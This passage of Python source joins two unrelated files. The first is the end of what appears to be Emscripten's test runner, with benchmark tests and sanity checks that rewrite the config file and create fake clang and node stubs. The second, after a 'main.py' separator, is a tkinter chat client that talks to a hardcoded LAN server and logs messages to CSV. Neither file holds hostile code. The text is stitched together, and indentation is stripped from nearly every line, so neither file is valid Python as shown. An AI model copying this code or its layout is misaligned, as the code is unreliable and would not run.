emcc_args = self.get_library('lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None) + \
['--embed-file', benchmark + '.lua']
#['--embed-file', 'binarytrees.lua', '--embed-file', 'scimark.lua'] + ['--minify', '0']
shutil.copyfile(emcc_args[0], emcc_args[0] + '.bc')
emcc_args[0] += '.bc'
native_args = self.get_library('lua_native', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None, native=True)
self.do_benchmark('lua_' + benchmark, '', expected,
force_c=True, args=[benchmark + '.lua', DEFAULT_ARG], emcc_args=emcc_args, native_args=native_args, native_exec=os.path.join('building', 'lua_native', 'src', 'lua'),
output_parser=output_parser, args_processor=args_processor)
def test_zzz_lua_scimark(self):
def output_parser(output):
return 100.0/float(re.search('\nSciMark +([\d\.]+) ', output).group(1))
self.lua('scimark', '[small problem sizes]', output_parser=output_parser)
def test_zzz_lua_binarytrees(self):
# js version: ['binarytrees.lua', {0: 0, 1: 9.5, 2: 11.99, 3: 12.85, 4: 14.72, 5: 15.82}[arguments[0]]]
self.lua('binarytrees', 'long lived tree of depth')
def test_zzz_zlib(self):
src = open(path_from_root('tests', 'zlib', 'benchmark.c'), 'r').read()
emcc_args = self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']) + \
['-I' + path_from_root('tests', 'zlib')]
native_args = self.get_library('zlib_native', os.path.join('libz.a'), make_args=['libz.a'], native=True) + \
['-I' + path_from_root('tests', 'zlib')]
self.do_benchmark('zlib', src, '''ok.''',
force_c=True, emcc_args=emcc_args, native_args=native_args)
def test_zzz_box2d(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'box2d', 'Benchmark.cpp'), 'r').read()
js_lib = self.get_library('box2d', [os.path.join('box2d.a')], configure=None)
native_lib = self.get_library('box2d_native', [os.path.join('box2d.a')], configure=None, native=True)
emcc_args = js_lib + ['-I' + path_from_root('tests', 'box2d')]
native_args = native_lib + ['-I' + path_from_root('tests', 'box2d')]
self.do_benchmark('box2d', src, 'frame averages', emcc_args=emcc_args, native_args=native_args)
def test_zzz_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'BenchmarkDemo.cpp'), 'r').read() + \
open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'main.cpp'), 'r').read()
js_lib = self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'])
native_lib = self.get_library('bullet_native', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'],
native=True)
emcc_args = js_lib + ['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks'),
'-s', 'DEAD_FUNCTIONS=["__ZSt9terminatev"]']
native_args = native_lib + ['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks')]
self.do_benchmark('bullet', src, '\nok.\n', emcc_args=emcc_args, native_args=native_args)
elif 'sanity' in str(sys.argv):
# Run some sanity checks on the test runner and emcc.
sys.argv = filter(lambda x: x != 'sanity', sys.argv)
print
print 'Running sanity checks.'
print 'WARNING: This will modify %s, and in theory can break it although it should be restored properly. A backup will be saved in %s_backup' % (EM_CONFIG, EM_CONFIG)
print
assert os.path.exists(CONFIG_FILE), 'To run these tests, we need a (working!) %s file to already exist' % EM_CONFIG
assert not os.environ.get('EMCC_DEBUG'), 'do not run sanity checks in debug mode!'
shutil.copyfile(CONFIG_FILE, CONFIG_FILE + '_backup')
def restore():
shutil.copyfile(CONFIG_FILE + '_backup', CONFIG_FILE)
SANITY_FILE = CONFIG_FILE + '_sanity'
def wipe():
try_delete(CONFIG_FILE)
try_delete(SANITY_FILE)
commands = [[EMCC], [PYTHON, path_from_root('tests', 'runner.py'), 'blahblah']]
def mtime(filename):
return os.stat(filename).st_mtime
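  # Each sanity test starts from a wiped config (setUp) and restores the user's
  # real config file from the backup afterwards (tearDown).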
class sanity(RunnerCore):
def setUp(self):
wipe()
def tearDown(self):
restore()
def do(self, command):
if type(command) is not list:
command = [command]
if command[0] == EMCC:
command = [PYTHON] + command
return Popen(command, stdout=PIPE, stderr=STDOUT).communicate()[0]
def check_working(self, command, expected=None):
if type(command) is not list:
command = [command]
if expected is None:
if command[0] == EMCC:
expected = 'no input files'
else:
expected = "has no attribute 'blahblah'"
output = self.do(command)
self.assertContained(expected, output)
return output
def test_aaa_normal(self): # this should be the very first thing that runs. if this fails, everything else is irrelevant!
for command in commands:
# Your existing EM_CONFIG should work!
restore()
self.check_working(command)
def test_firstrun(self):
for command in commands:
wipe()
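        # Create empty executable stubs in a temp dir prepended to PATH, so the
        # first-run auto-detection picks them up as llvm-dis, node and python2.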
def make_executable(name):
with open(os.path.join(temp_bin, name), 'w') as f:
os.fchmod(f.fileno(), stat.S_IRWXU)
try:
temp_bin = tempfile.mkdtemp()
old_environ_path = os.environ['PATH']
os.environ['PATH'] = temp_bin + os.pathsep + old_environ_path
make_executable('llvm-dis')
make_executable('node')
make_executable('python2')
output = self.do(command)
finally:
os.environ['PATH'] = old_environ_path
shutil.rmtree(temp_bin)
self.assertContained('Welcome to Emscripten!', output)
self.assertContained('This is the first time any of the Emscripten tools has been run.', output)
self.assertContained('A settings file has been copied to %s, at absolute path: %s' % (EM_CONFIG, CONFIG_FILE), output)
self.assertContained('It contains our best guesses for the important paths, which are:', output)
self.assertContained('LLVM_ROOT', output)
self.assertContained('NODE_JS', output)
self.assertContained('PYTHON', output)
        if platform.system() != 'Windows':
# os.chmod can't make files executable on Windows
self.assertIdentical(temp_bin, re.search("^ *LLVM_ROOT *= (.*)$", output, re.M).group(1))
self.assertIdentical(os.path.join(temp_bin, 'node'), re.search("^ *NODE_JS *= (.*)$", output, re.M).group(1))
self.assertIdentical(os.path.join(temp_bin, 'python2'), re.search("^ *PYTHON *= (.*)$", output, re.M).group(1))
self.assertContained('Please edit the file if any of those are incorrect', output)
self.assertContained('This command will now exit. When you are done editing those paths, re-run it.', output)
assert output.split()[-1].endswith('===='), 'We should have stopped: ' + output
config_file = open(CONFIG_FILE).read()
template_file = open(path_from_root('tools', 'settings_template_readonly.py')).read()
self.assertNotContained('~/.emscripten', config_file)
self.assertContained('~/.emscripten', template_file)
self.assertNotContained('{{{', config_file)
self.assertNotContained('}}}', config_file)
self.assertContained('{{{', template_file)
self.assertContained('}}}', template_file)
for content in ['EMSCRIPTEN_ROOT', 'LLVM_ROOT', 'NODE_JS', 'TEMP_DIR', 'COMPILER_ENGINE', 'JS_ENGINES']:
self.assertContained(content, config_file)
# The guessed config should be ok XXX This depends on your local system! it is possible `which` guesses wrong
#try_delete('a.out.js')
#output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world.c')], stdout=PIPE, stderr=PIPE).communicate()
#self.assertContained('hello, world!', run_js('a.out.js'), output)
# Second run, with bad EM_CONFIG
for settings in ['blah', 'LLVM_ROOT="blarg"; JS_ENGINES=[]; COMPILER_ENGINE=NODE_JS=SPIDERMONKEY_ENGINE=[]']:
f = open(CONFIG_FILE, 'w')
f.write(settings)
f.close()
output = self.do(command)
if 'LLVM_ROOT' not in settings:
self.assertContained('Error in evaluating %s' % EM_CONFIG, output)
elif 'runner.py' not in ' '.join(command):
self.assertContained('CRITICAL', output) # sanity check should fail
def test_closure_compiler(self):
CLOSURE_FATAL = 'fatal: Closure compiler'
CLOSURE_WARNING = 'does not exist'
# Sanity check should find closure
restore()
output = self.check_working(EMCC)
self.assertNotContained(CLOSURE_FATAL, output)
self.assertNotContained(CLOSURE_WARNING, output)
# Append a bad path for closure, will warn
f = open(CONFIG_FILE, 'a')
f.write('CLOSURE_COMPILER = "/tmp/nowhere/nothingtoseehere/kjadsfkjwelkjsdfkqgas/nonexistent.txt"\n')
f.close()
output = self.check_working(EMCC, CLOSURE_WARNING)
# And if you actually try to use the bad path, will be fatal
f = open(CONFIG_FILE, 'a')
f.write('CLOSURE_COMPILER = "/tmp/nowhere/nothingtoseehere/kjadsfkjwelkjsdfkqgas/nonexistent.txt"\n')
f.close()
output = self.check_working([EMCC, '-O2', '-s', 'ASM_JS=0', '--closure', '1', 'tests/hello_world.cpp'], CLOSURE_FATAL)
# With a working path, all is well
restore()
try_delete('a.out.js')
output = self.check_working([EMCC, '-O2', '-s', 'ASM_JS=0', '--closure', '1', 'tests/hello_world.cpp'], '')
assert os.path.exists('a.out.js'), output
def test_llvm(self):
LLVM_WARNING = 'LLVM version appears incorrect'
restore()
# Clang should report the version number we expect, and emcc should not warn
assert check_clang_version()
output = self.check_working(EMCC)
assert LLVM_WARNING not in output, output
# Fake a different llvm version
restore()
f = open(CONFIG_FILE, 'a')
f.write('LLVM_ROOT = "' + path_from_root('tests', 'fake') + '"')
f.close()
if not os.path.exists(path_from_root('tests', 'fake')):
os.makedirs(path_from_root('tests', 'fake'))
try:
os.environ['EM_IGNORE_SANITY'] = '1'
for x in range(-2, 3):
for y in range(-2, 3):
f = open(path_from_root('tests', 'fake', 'clang'), 'w')
f.write('#!/bin/sh\n')
f.write('echo "clang version %d.%d" 1>&2\n' % (EXPECTED_LLVM_VERSION[0] + x, EXPECTED_LLVM_VERSION[1] + y))
f.close()
shutil.copyfile(path_from_root('tests', 'fake', 'clang'), path_from_root('tests', 'fake', 'clang++'))
os.chmod(path_from_root('tests', 'fake', 'clang'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
os.chmod(path_from_root('tests', 'fake', 'clang++'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
if x != 0 or y != 0:
output = self.check_working(EMCC, LLVM_WARNING)
else:
output = self.check_working(EMCC)
assert LLVM_WARNING not in output, output
finally:
del os.environ['EM_IGNORE_SANITY']
def test_node(self):
NODE_WARNING = 'node version appears too old'
NODE_WARNING_2 = 'cannot check node version'
restore()
# Clang should report the version number we expect, and emcc should not warn
assert check_node_version()
output = self.check_working(EMCC)
assert NODE_WARNING not in output, output
# Fake a different node version
restore()
f = open(CONFIG_FILE, 'a')
f.write('NODE_JS = "' + path_from_root('tests', 'fake', 'nodejs') + '"')
f.close()
if not os.path.exists(path_from_root('tests', 'fake')):
os.makedirs(path_from_root('tests', 'fake'))
try:
os.environ['EM_IGNORE_SANITY'] = '1'
for version, succeed in [('v0.7.9', False), ('v0.8.0', True), ('v0.8.1', True), ('cheez', False)]:
f = open(path_from_root('tests', 'fake', 'nodejs'), 'w')
f.write('#!/bin/sh\n')
f.write('''if [ $1 = "--version" ]; then
echo "%s"
else
%s $@
fi
''' % (version, NODE_JS))
f.close()
os.chmod(path_from_root('tests', 'fake', 'nodejs'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
if not succeed:
if version[0] == 'v':
self.check_working(EMCC, NODE_WARNING)
else:
self.check_working(EMCC, NODE_WARNING_2)
else:
output = self.check_working(EMCC)
assert NODE_WARNING not in output, output
finally:
del os.environ['EM_IGNORE_SANITY']
def test_emcc(self):
SANITY_MESSAGE = 'Emscripten: Running sanity checks'
SANITY_FAIL_MESSAGE = 'sanity check failed to run'
# emcc should check sanity if no ${EM_CONFIG}_sanity
restore()
time.sleep(0.1)
assert not os.path.exists(SANITY_FILE) # restore is just the settings, not the sanity
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
assert os.path.exists(SANITY_FILE) # EMCC should have checked sanity successfully
assert mtime(SANITY_FILE) >= mtime(CONFIG_FILE)
assert generate_sanity() == open(SANITY_FILE).read()
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc run again should not sanity check, because the sanity file is newer
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# correct sanity contents mean we need not check
open(SANITY_FILE, 'w').write(generate_sanity())
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
# incorrect sanity contents mean we *must* check
open(SANITY_FILE, 'w').write('wakawaka')
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
# but with EMCC_DEBUG=1 we should check
try:
os.environ['EMCC_DEBUG'] = '1'
output = self.check_working(EMCC)
finally:
del os.environ['EMCC_DEBUG']
self.assertContained(SANITY_MESSAGE, output)
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
# Make sure the test runner didn't do anything to the setup
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc should also check sanity if the file is outdated
time.sleep(0.1)
restore()
assert mtime(SANITY_FILE) < mtime(CONFIG_FILE)
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
assert mtime(SANITY_FILE) >= mtime(CONFIG_FILE)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc should be configurable directly from EM_CONFIG without any config file
restore()
config = open(CONFIG_FILE, 'r').read()
os.environ['EM_CONFIG'] = config
wipe()
dirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
open(os.path.join(dirname, 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from emcc with no config file\\n");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(dirname, 'main.cpp'), '-o', os.path.join(dirname, 'a.out.js')]).communicate()
del os.environ['EM_CONFIG']
old_dir = os.getcwd()
try:
os.chdir(dirname)
self.assertContained('hello from emcc with no config file', run_js('a.out.js'))
finally:
os.chdir(old_dir)
shutil.rmtree(dirname)
try_delete(CANONICAL_TEMP_DIR)
def test_emcc_caching(self):
INCLUDING_MESSAGE = 'including X'
BUILDING_MESSAGE = 'building X for cache'
ERASING_MESSAGE = 'clearing cache'
EMCC_CACHE = Cache.dirname
for compiler in [EMCC, EMXX]:
print compiler
restore()
Cache.erase()
assert not os.path.exists(EMCC_CACHE)
try:
os.environ['EMCC_DEBUG'] = '1'
self.working_dir = os.path.join(TEMP_DIR, 'emscripten_temp')
# Building a file that doesn't need cached stuff should not trigger cache generation
output = self.do([compiler, path_from_root('tests', 'hello_world.cpp')])
assert INCLUDING_MESSAGE.replace('X', 'libc') not in output
assert BUILDING_MESSAGE.replace('X', 'libc') not in output
self.assertContained('hello, world!', run_js('a.out.js'))
assert not os.path.exists(EMCC_CACHE)
try_delete('a.out.js')
basebc_name = os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-0-basebc.bc')
dcebc_name = os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-1-linktime.bc')
ll_names = [os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-X-ll.ll').replace('X', str(x)) for x in range(2,5)]
# Building a file that *does* need dlmalloc *should* trigger cache generation, but only the first time
for filename, libname in [('hello_malloc.cpp', 'libc'), ('hello_libcxx.cpp', 'libcxx')]:
for i in range(3):
print filename, libname, i
self.clear()
try_delete(basebc_name) # we might need to check this file later
try_delete(dcebc_name) # we might need to check this file later
for ll_name in ll_names: try_delete(ll_name)
output = self.do([compiler, '-O' + str(i), '-s', 'RELOOP=0', '--llvm-lto', '0', path_from_root('tests', filename)])
#print output
assert INCLUDING_MESSAGE.replace('X', libname) in output
if libname == 'libc':
assert INCLUDING_MESSAGE.replace('X', 'libcxx') not in output # we don't need libcxx in this code
else:
assert INCLUDING_MESSAGE.replace('X', 'libc') in output # libcxx always forces inclusion of libc
assert (BUILDING_MESSAGE.replace('X', libname) in output) == (i == 0), 'Must only build the first time'
self.assertContained('hello, world!', run_js('a.out.js'))
assert os.path.exists(EMCC_CACHE)
assert os.path.exists(os.path.join(EMCC_CACHE, libname + '.bc'))
if libname == 'libcxx':
print os.stat(os.path.join(EMCC_CACHE, libname + '.bc')).st_size, os.stat(basebc_name).st_size, os.stat(dcebc_name).st_size
assert os.stat(os.path.join(EMCC_CACHE, libname + '.bc')).st_size > 1000000, 'libc++ is big'
assert os.stat(basebc_name).st_size > 1000000, 'libc++ is indeed big'
assert os.stat(dcebc_name).st_size < 500000, 'Dead code elimination must remove most of libc++'
# should only have metadata in -O0, not 1 and 2
if i > 0:
for ll_name in ll_names:
ll = None
try:
ll = open(ll_name).read()
break
except:
pass
assert ll
assert ll.count('\n!') < 10 # a few lines are left even in -O1 and -O2
finally:
del os.environ['EMCC_DEBUG']
# Manual cache clearing
assert os.path.exists(EMCC_CACHE)
output = self.do([EMCC, '--clear-cache'])
assert ERASING_MESSAGE in output
assert not os.path.exists(EMCC_CACHE)
try_delete(CANONICAL_TEMP_DIR)
def test_relooper(self):
RELOOPER = Cache.get_path('relooper.js')
restore()
for phase in range(2): # 0: we wipe the relooper dir. 1: we have it, so should just update
if phase == 0: Cache.erase()
try_delete(RELOOPER)
for i in range(4):
print >> sys.stderr, phase, i
opt = min(i, 2)
try_delete('a.out.js')
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop.cpp'), '-O' + str(opt), '-g'],
stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('hello, world!', run_js('a.out.js'))
output = '\n'.join(output)
assert ('bootstrapping relooper succeeded' in output) == (i == 2), 'only bootstrap on first O2: ' + output
assert os.path.exists(RELOOPER) == (i >= 2), 'have relooper on O2: ' + output
src = open('a.out.js').read()
main = src.split('function _main()')[1].split('\n}\n')[0]
assert ('while (1) {' in main or 'while(1){' in main or '} while ($' in main or '}while($' in main) == (i >= 2), 'reloop code on O2: ' + main
assert ('switch' not in main) == (i >= 2), 'reloop code on O2: ' + main
def test_jcache(self):
PRE_LOAD_MSG = 'loading pre from jcache'
PRE_SAVE_MSG = 'saving pre to jcache'
FUNC_CHUNKS_LOAD_MSG = ' funcchunks from jcache'
FUNC_CHUNKS_SAVE_MSG = ' funcchunks to jcache'
JSFUNC_CHUNKS_LOAD_MSG = 'jsfuncchunks from jcache'
JSFUNC_CHUNKS_SAVE_MSG = 'jsfuncchunks to jcache'
restore()
Cache.erase()
try:
os.environ['EMCC_DEBUG'] = '1'
os.environ['EMCC_JSOPT_MIN_CHUNK_SIZE'] = str(1024*512)
self.working_dir = os.path.join(TEMP_DIR, 'emscripten_temp')
if not os.path.exists(self.working_dir): os.makedirs(self.working_dir)
assert not os.path.exists(JCache.get_cachename('emscript_files'))
srcs = {}
used_jcache = False
for args, input_file, expect_pre_save, expect_pre_load, expect_funcs_save, expect_funcs_load, expect_jsfuncs_save, expect_jsfuncs_load, expected in [
([], 'hello_world_loop.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_world_loop.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_world_loop.cpp', False, True, False, True, False, True, []),
([], 'hello_world_loop.cpp', False, False, False, False, False, False, []),
# new
([], 'hello_world.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_world.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_world.cpp', False, True, False, True, False, True, []),
([], 'hello_world.cpp', False, False, False, False, False, False, []),
# go back to old file, experience caching
(['--jcache'], 'hello_world_loop.cpp', False, True, False, True, False, True, []),
# new, large file
([], 'hello_malloc.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_malloc.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_malloc.cpp', False, True, False, True, False, True, []),
([], 'hello_malloc.cpp', False, False, False, False, False, False, []),
# new, huge file
([], 'hello_libcxx.cpp', False, False, False, False, False, False, ('3 chunks',)),
(['--jcache'], 'hello_libcxx.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_libcxx.cpp', False, True, False, True, False, True, []),
([], 'hello_libcxx.cpp', False, False, False, False, False, False, []),
# finally, build a file close to the previous, to see that some chunks are found in the cache and some not
(['--jcache'], 'hello_libcxx_mod1.cpp', False, True, True, True, True, True, []), # win on pre, mix on funcs, mix on jsfuncs
(['--jcache'], 'hello_libcxx_mod1.cpp', False, True, False, True, False, True, []),
(None, None, None, None, None, None, None, None, None), # clear
(['--jcache'], 'hello_libcxx_mod2.cpp', True, False, True, False, True, False, []), # load into cache
(['--jcache'], 'hello_libcxx_mod2a.cpp', False, True, True, True, True, True, []) # add a printf, do not lose everything
]:
self.clear()
if args is None:
Cache.erase()
continue
print >> sys.stderr, args, input_file, expect_pre_save, expect_pre_load, expect_funcs_save, expect_funcs_load, expect_jsfuncs_save, expect_jsfuncs_load, expected
out, err = Popen([PYTHON, EMCC, '-O2', '-g', path_from_root('tests', input_file)] + args, stdout=PIPE, stderr=PIPE).communicate()
errtail = err.split('emcc invocation')[-1]
self.assertContained('hello, world!', run_js('a.out.js'), errtail)
assert (PRE_SAVE_MSG in err) == expect_pre_save, errtail
assert (PRE_LOAD_MSG in err) == expect_pre_load, errtail
assert (FUNC_CHUNKS_SAVE_MSG in err) == expect_funcs_save, errtail
assert (FUNC_CHUNKS_LOAD_MSG in err) == expect_funcs_load, errtail
assert (JSFUNC_CHUNKS_SAVE_MSG in err) == expect_jsfuncs_save, errtail
assert (JSFUNC_CHUNKS_LOAD_MSG in err) == expect_jsfuncs_load, errtail
for expect in expected: assert expect in err, expect + ' ? ' + errtail
curr = open('a.out.js').read()
if input_file not in srcs:
srcs[input_file] = curr
else:
#open('/home/alon/Dev/emscripten/a', 'w').write(srcs[input_file])
#open('/home/alon/Dev/emscripten/b', 'w').write(curr)
assert abs(len(curr)/float(len(srcs[input_file]))-1)<0.01, 'contents may shift in order, but must remain the same size %d vs %d' % (len(curr), len(srcs[input_file])) + '\n' + errtail
used_jcache = used_jcache or ('--jcache' in args)
assert used_jcache == os.path.exists(JCache.get_cachename('emscript_files'))
#print >> sys.stderr, errtail
finally:
del os.environ['EMCC_DEBUG']
del os.environ['EMCC_JSOPT_MIN_CHUNK_SIZE']
else:
raise Exception('Test runner is confused: ' + str(sys.argv))
if __name__ == '__main__':
# Sanity checks
total_engines = len(JS_ENGINES)
JS_ENGINES = filter(check_engine, JS_ENGINES)
if len(JS_ENGINES) == 0:
print 'WARNING: None of the JS engines in JS_ENGINES appears to work.'
elif len(JS_ENGINES) < total_engines:
print 'WARNING: Not all the JS engines in JS_ENGINES appear to work; ignoring the broken ones.'
# Skip requested tests
for i in range(len(sys.argv)):
arg = sys.argv[i]
if arg.startswith('skip:'):
which = arg.split('skip:')[1]
if which.startswith('ALL.'):
ignore, test = which.split('.')
which = map(lambda mode: mode+'.'+test, test_modes)
else:
which = [which]
print >> sys.stderr, ','.join(which)
for test in which:
print >> sys.stderr, 'will skip "%s"' % test
exec(test + ' = RunnerCore.skipme')
sys.argv[i] = ''
sys.argv = filter(lambda arg: arg, sys.argv)
# Go
unittest.main(verbosity=2)
|
main.py
|
# Importing the modules
from tkinter import *
from tkinter.font import BOLD
import socket
import threading
import random
import csv
import pygame
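# Pick one random hex colour (e.g. '#1A2B3C') to theme this client's window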
r = lambda: random.randint(0, 255)
color = '#%02X%02X%02X' % (r(), r(), r())
# client connections
PORT = 5000
SERVER = "192.168.56.1"
ADDRESS = (SERVER, PORT)
FORMAT = "utf-8"
# Create a new client socket
# and connect to the server
client = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
client.connect(ADDRESS)
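# NOTE: a matching chat server must already be listening on ADDRESS,
# otherwise connect() raises ConnectionRefusedError.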
# making the GUI
class GUI:
"""
<summary>
This is the main class for the GUI.
</summary>
<functions>
continue_ahead()
chatroom()
sendButton()
message_from_server()
message_to_server()
update_database()
play_sound()
setting_window()
change_color_window()
</functions>
"""
def __init__(self):
""" <summary>
Main Constructor.
</summary>
<param>
***No params***
</param>
"""
self.root = Tk()
self.root.withdraw()
self.sign_up = Toplevel()
self.sign_up.geometry('300x300')
self.please_details = Label(self.sign_up,
text="Please sign up to continue",
font=('Arial', 8, BOLD))
self.please_details.place(x=90, y=100)
self.name_label = Label(self.sign_up,
text="Name: ",
font=('Arial', 8, BOLD))
self.name_label.place(x=50, y=130)
self.input_box = Entry(self.sign_up,
highlightthickness=2)
self.input_box.place(x=100, y=130)
self.input_box.focus()
self.continue_button = Button(self.sign_up,
text="Continue",
height=2,
width=10,
bg='grey',
fg='white',
command=lambda: self.continue_ahead(self.input_box.get()))
self.continue_button.place(relx=0.4, rely=0.55)
self.root.mainloop()
def continue_ahead(self, name):
"""
<summary>
It is the main login controller.
</summary>
:param name: the name to display in the chatroom.
:return: None
"""
self.sign_up.destroy()
self.chatroom(name)
receive = threading.Thread(target=self.message_from_server)
receive.start()
def chatroom(self, name):
"""
<summary>
This is the main function for the chatroom that will
control the chat and will display some buttons and chat fields.
</summary>
:param name: the name to display at the top of the window.
:return: None
"""
self.user_name = name
self.root.deiconify()
self.root.geometry('470x550')
self.root.configure(bg=color)
self.root.title('CHATROOM')
self.heading = Label(self.root,
text=self.user_name,
bg=color,
fg="#EAECEE",
font="Helvetica 13 bold",
pady=5)
self.heading.pack()
try:
self.photo = PhotoImage(file=r"assets/black-settings-button.png")
except TclError:
# tkinter.PhotoImage raises TclError (not IOError) for a missing file;
# fall back to an image-less settings button so the GUI still starts
self.photo = None
print("There is an error: the assets folder is missing or the path is wrong.")
self.settings_button = Button(self.root, image=self.photo, pady=5, command=self.setting_window)
self.settings_button.place(relx=0.9, rely=0.02)
self.space_for_message = Text(self.root,
width=20,
height=2,
bg="#17202A",
fg="#EAECEE",
font="Helvetica 14",
padx=5,
pady=5)
self.space_for_message.place(relheight=0.745,
relwidth=1,
rely=0.08)
self.bottom_design = Label(self.root,
bg="#ABB2B9",
height=40)
self.bottom_design.place(relwidth=1,
rely=0.925)
self.message_input = Entry(self.bottom_design,
bg="#616A6B",
fg="#000000",
font="Helvetica 13")
self.message_input.place(relwidth=0.74,
relheight=0.04,
rely=0.008,
relx=0.011)
self.message_input.focus()
self.send_button = Button(self.bottom_design,
text="Send",
font="Helvetica 10 bold",
width=20, bg="#ABB2B9",
command=lambda: self.sendButton(self.message_input.get()))
self.send_button.place(relx=0.77,
rely=0.008,
relheight=0.04,
relwidth=0.22)
self.scrollbar = Scrollbar(self.space_for_message)
self.scrollbar.place(relheight=1,
relx=0.974)
self.scrollbar.config(command=self.space_for_message.yview)
self.space_for_message.config(state=DISABLED)
def sendButton(self, msg):
"""
<summary>
This function consist of the send button and its code.
</summary>
:param msg: the string written by the user on the text field of the chatroom.
:return: None
"""
self.space_for_message.config(state=DISABLED)
self.msg = msg
self.message_input.delete(0, END)
self.update_database()
self.snd = threading.Thread(target=self.message_to_server)
self.snd.start()
def message_from_server(self):
"""
<summary>
Receives and decodes messages from the server.
</summary>
:return: None
"""
while True:
try:
message = client.recv(1024).decode(FORMAT)
if message == 'NAME':
client.send(self.user_name.encode(FORMAT))
else:
self.play_sound()
self.space_for_message.config(state=NORMAL)
self.space_for_message.insert(END, message + "\n\n")
self.space_for_message.config(state=DISABLED)
self.space_for_message.see(END)
except:
print("there are some issues while connecting to the server, the client will disconnect soon.")
client.close()
break
def message_to_server(self):
"""
<summary>
Encodes the message and sends it to the server.
</summary>
:return: None
"""
self.space_for_message.config(state=DISABLED)
while True:
message = f"{self.user_name}: {self.msg}"
client.send(message.encode(FORMAT))
break
def update_database(self):
"""
<summary>
Appends the user name and message to the database.csv file.
</summary>
:return: None
"""
try:
rowlist = [[self.user_name, self.msg]]
with open('database.csv', 'a', newline='') as file:
writer = csv.writer(file)
writer.writerows(rowlist)
self.play_sound()
except Exception as exo:
print("There was a problem writing to the database:", exo)
def play_sound(self):
"""
<summary>
Plays a sound when a message is sent or received.
</summary>
:return: None
"""
pygame.mixer.init()
try:
self.crash_sound = pygame.mixer.Sound("assets/insight-578.mp3")
self.crash_sound.play()
except (pygame.error, FileNotFoundError):
# pygame.mixer.Sound raises pygame.error (or FileNotFoundError on newer
# pygame) for a missing file; play() sits inside the try so a failed
# load cannot crash on an undefined attribute
print("There is an error: the assets folder is missing or the path is wrong.")
def setting_window(self):
"""
<summary>
This is the main function for the setting window.
</summary>
:return: None
"""
self.settings = Tk()
self.settings.geometry('250x250')
Label(self.settings, text="COLOR").pack()
self.color_black = Button(self.settings, bg='black', width=5, height=2,
command=lambda: self.change_color_window('black'))
self.color_black.place(rely=0.1)
self.color_white = Button(self.settings, bg='white', width=5, height=2,
command=lambda: self.change_color_window('white'))
self.color_white.place(rely=0.3)
self.color_red = Button(self.settings, bg='red', width=5, height=2,
command=lambda: self.change_color_window('red'))
self.color_red.place(rely=0.5)
self.color_orange = Button(self.settings, bg='orange', width=5, height=2,
command=lambda: self.change_color_window('orange'))
self.color_orange.place(relx=0.2, rely=0.1)
self.color_blue = Button(self.settings, bg='blue', width=5, height=2,
command=lambda: self.change_color_window('blue'))
self.color_blue.place(relx=0.2, rely=0.3)
self.color_yellow = Button(self.settings, bg='yellow', width=5, height=2,
command=lambda: self.change_color_window('yellow'))
self.color_yellow.place(relx=0.2, rely=0.5)
self.color_unknown = Button(self.settings, bg='#58D68D', width=5, height=2,
command=lambda: self.change_color_window('#58D68D'))
self.color_unknown.place(relx=0.4, rely=0.1)
self.color_unknown2 = Button(self.settings, bg='#A569BD', width=5, height=2,
command=lambda: self.change_color_window('#A569BD'))
self.color_unknown2.place(relx=0.4, rely=0.3)
self.color_unknown3 = Button(
self.settings,
bg='#D35400',
width=5,
height=2,
command=lambda: self.change_color_window('#D35400'))
self.color_unknown3.place(relx=0.4, rely=0.5)
def change_color_window(self, color):
"""
<summary>
This function changes the background color of the window.
</summary>
:param color: the color selected by the user from the settings.
:return: None
"""
self.root.configure(bg=color)
self.heading.configure(bg=color)
g = GUI() # creating the object.
